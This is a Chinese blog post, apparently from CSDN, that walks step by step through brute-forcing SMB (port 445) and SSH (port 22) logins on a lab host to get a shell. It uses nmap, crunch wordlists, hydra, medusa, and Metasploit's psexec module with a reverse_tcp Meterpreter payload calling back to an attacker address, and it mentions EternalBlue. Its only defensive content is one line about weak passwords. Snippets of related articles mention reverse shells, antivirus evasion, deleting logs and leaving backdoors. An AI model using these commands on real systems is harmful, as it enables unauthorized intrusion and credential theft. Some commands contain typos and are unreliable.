爆破445端口和22端口拿shell

最新推荐文章于 2025-03-10 11:59:03 发布
原创 最新推荐文章于 2025-03-10 11:59:03 发布 · 4.5k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了使用nmap进行端口扫描的方法,特别是针对SMB服务的445端口检查。通过hydra工具进行密码爆破攻击,演示了如何制作字典文件并利用其破解SMB认证。此外,还讨论了使用Metasploit框架进行进一步的渗透测试,并警告了简单密码设置的风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

工具hydua、nmap
使用nmap扫描是否开启smb服务即445端口

nmap -O 172.168.172.131

在这里插入图片描述
发现开启,制作字典passwd.txt

crunch 1 4 1234 -o passwd .txt

在这里插入图片描述

hydra -l hack -P passwd.txt smb://172.168.172.131 -f -vV

在这里插入图片描述
密码爆破成功

在这里插入图片描述
启动msf
在这里插入图片描述
使用模块:

user exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

show options

在这里插入图片描述

set rhost 172.168172.131
set smb pass 123
set smbuser hack
set lhost 172.168.172.15

在这里插入图片描述
使用exploit(windows/smb/ms17_010_eternalblue)攻击win2008等都是把他们打重启,醉了。
在这里插入图片描述
ssh爆破

medusa -M ssh -h 172.168.172.139 -u root -P passwd.dic

在这里插入图片描述
所以最好别设置太简单的密码

应用协议安全:Hydra 端口爆破工具.(九头蛇)
网络安全领域___专研者.
05-16 4010
Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号密码进行爆破,包括 Web 登录、数据库、SSH、FTP 等服务.
2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀
m0_65842464的博客
02-03 1207
python-Socket编程:主要对端口扫描、子域名扫描、客户端服务端通信等脚本简单实现,python打包工具pyinsaller使用,以及python代码执行shellcode-CS上线。pyinstaller --onefile --noconsole your_script.py #cmd命令:pyinstaller打包。s=os.popen(cmdLine).read() #python代码执行cmd命令。1、python版本与shellcodes生成位数一致。
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名旁站域名进行安全探测
Python 渗透测试:SSH 加密通道 传输文件 爆破.(22 端口
网络安全领域___专研者.
05-17 659
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络环境中进行安全的远程连接数据传输。SSH 爆破是一种常见的网络攻击手段,它试图通过暴力破解的方式获取远程 SSH 服务器的登录凭证。
端口渗透--22--SSH
m0_53623841的博客
10-12 2247
打开win10上的设置--应用--可选功能--添加功能--openssh。找到防火墙上的高级设置,在入站规则中新建规则,端口22,点击下一步安装。(因为是实验,所以提前在win10上开启ssh服务,确保22端口打开)用nmap进行信息收集,可以看到靶机开放了22端口的ssh服务。所以账号为:xiaoxiao,密码为:123456,直接连接。同样可以看到账号:xiaoxiao,密码:123456,连接。直接进行暴力破解,可以看到,第一条数据有一个成功的标识。win+R--输入services.msc。
hydra 爆破44522端口(笔记)
边城浪子的博客
11-14 4885
一。爆破445 smb 1.命令行:hydra 192.168.0.104 smb -l Administrator -P /root/Desktop/1.txt -T 64 -V 192.168.0.104是目标服务器的IP地址 smb 是协议 -L 大写指定一个帐号字典 小写l指定用户名称 -P 指定一个密码字典 小写p指定一个密码 -V 现实爆破测试的详细过程 -t 线程1-64之...
工具源码.zip_c段查询_getshell_漏洞扫描_爆破_端口爆破
07-13
工具功能 1:漏洞扫描 2::0day测试 3:cms漏洞扫描 4:旁注c段查询 5:sql注入攻击 6:SQL注入检测 7:漏洞URL采集 8:CMS识别 9:Getshell自动 10:穷举爆破 11:漏洞爬行 12:安全文章对接推送 ...16:端口扫描
445端口,修不完的BUG
lucas_cl的博客
05-13 1247
最近爆发的WannaCry(意译为“想哭”)的蠕虫病毒,可谓是在国内火了一把,该病毒通过ms17_010漏洞进行攻击。此次爆出的445端口的漏洞,在历史上并不是第一次了,ms08_067历史上也是一次造成了国内外许多公司、个人的计算机被远程控制。可能许多人不太明白什么是远程溢出攻击,为啥电脑好好的就会被破坏?远程溢出攻击可以算的上是真正意义上的’黑‘客攻击,甚至不需要计算机用户进行任何操作。下面我
常用服务端口及入侵方式
weixin_44277013的博客
07-27 855
常用服务端口及入侵方式 FTP-21 FTP:文件传输协议,使用TCP端口20、21。20用于传输数据,21用于传输控制信息。 (1) ftp基础爆破: owasp的Bruter,hydra以及msf中的ftp爆破模块 (2) ftp匿名访问:用户名: anonymous密码:为空或者任意邮箱 (3) vsftpd后门: vsftpd 2到2.3.4版本存在后门漏洞,通过该漏洞获取root权限 (4)嗅探: ftp使用明文传输,使用Cain进行渗透。(但是嗅探需要在局域网并需要欺骗或监听网关) (5)
〖教程〗LadonGO MongoDB密码爆破27017端口
K8哥哥
07-27 1101
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,12种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/Mong
445端口攻击详解/教学
03-22
445端口攻击 详解/教学 仅供教学。 后果自承,私人收藏
hydra(九头蛇)爆破常见端口
guanjian_ci的博客
05-11 6501
整理一下 hydra 端口爆破命令语法 目录: 简介 1. 21端口爆破命令 2. 22端口爆破命令 3. 1433端口爆破命令 4. 3306端口爆破命令 5. 3389端口爆破命令 6. smb服务爆破命令 7. imap服务爆破命令 总结 简介 hydra 也称九头蛇, 是著名黑客组织thc的一款开源的暴力密码破解工具,可以破解多种密码。 1. 21端口爆破命令 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务, FTP服务主要是为
端口爆破是什么意思/针对Web与系统端口层面的密码穷举爆破_小白信息安全知识点
程序员六七的博客
05-09 682
关于这篇文章本文适合刚刚接触的初学者进行学习 写本文即是对本人知识点的整理也是为了学习 (求各位大牛指出本文的不足说错的地方) 文章内容相对来说有点长长长长
计算机端口爆破,Tomcat8080端口爆破及原理 | kTWO-个人博客
weixin_42388680的博客
07-26 1538
Tomcat是非常常见的web服务程序,但是,有些管理员对Tomcat不熟悉,导致配置不当,很容易就会被入侵,使用8080爆破工具扫描很容易就能找到大量的不安全不服气,也很容易被提权,博主之前也使用该工具进行爆破,后来就先弄清楚其原理,经过后来的研究终于弄明白了Tomcat的登陆认证原理。下面进入正题。一、Tomcat基础认证说白了就是登陆tomcat。例子:http://101.201.151....
445端口攻击
热门推荐
m0_61948493的博客
11-23 1万+
一、简单的渗透攻击 1、端口 首先要先了解了解一下一些基本的端口所对应的服务: 1)FTP:文件共享服务 2)SSH:专为远程登陆会话其他网络服务提供安全性的协议,有效防止远程管理过程中的信息泄露问题(比telnet安全) 3)telnet: Internet远程登录服务的标准协议主要方式 4)SMTP: 建立在FTP文件传输服务上的一种邮件服务 5)DNS : 域名解析服务 6)HTTP 、HTTPS:超文本传输协议(建立在TCP,HTTPS比HTTP更安全) 7)共享...
SSH端口22完全沦陷:5个步骤渗透测试全过程
最新发布
qq_41314882的博客
03-10 1453
SSH(Secure Shell)是一种用于在不安全网络上建立安全连接的协议,主要用于远程服务器管理。由于 SSH 端口
shell实现自动化扫描主机端口爆破服务弱口令
chaojixiaojingang
08-11 2928
今天看同学写了用shell实现自动化扫描主机端口爆破服务弱口令,感觉很有用,将来进公司可以方便我完成一些工作。 需求 假设现在有一个需求,公司分配给你了一个ip列表,要求你将其中存活的主机筛选出来,检查这些主机是否开启了常用的服务,以及是否存在弱口令。 一般常用的做法就是先利用nmap扫描出存活主机,然后扫描这些主机开放的端口,用hydra对这些端口进行弱口令安全检查。如果将这些命令写在一个sh...
渗透测试(445端口
qq_45433707的博客
05-23 2506
笔记 由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到) 1.授权 2.信息收集(nslookup whois) 3.扫描漏洞 ​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描; ​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0 ​ 扫描网站漏洞(十大网站漏洞 ) 4.漏洞利用 5.提权(shell环境命令控制权,桌面环境,最高权限) =======删库跑路 6.毁尸灭迹(删除日志) 7.留后门 8.
使用metasploit框架对win7进行爆破提权 上传具体的实验步骤
10-12
3. **配置漏洞利用**: 设置目标主机信息、监听端口等,例如`set RHOST [target_ip]` `set LPORT [listening_port]`。 4. **执行提权**: `run`命令执行漏洞利用。 **注意事项:** - 在实际操作中,要遵守法律法规...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值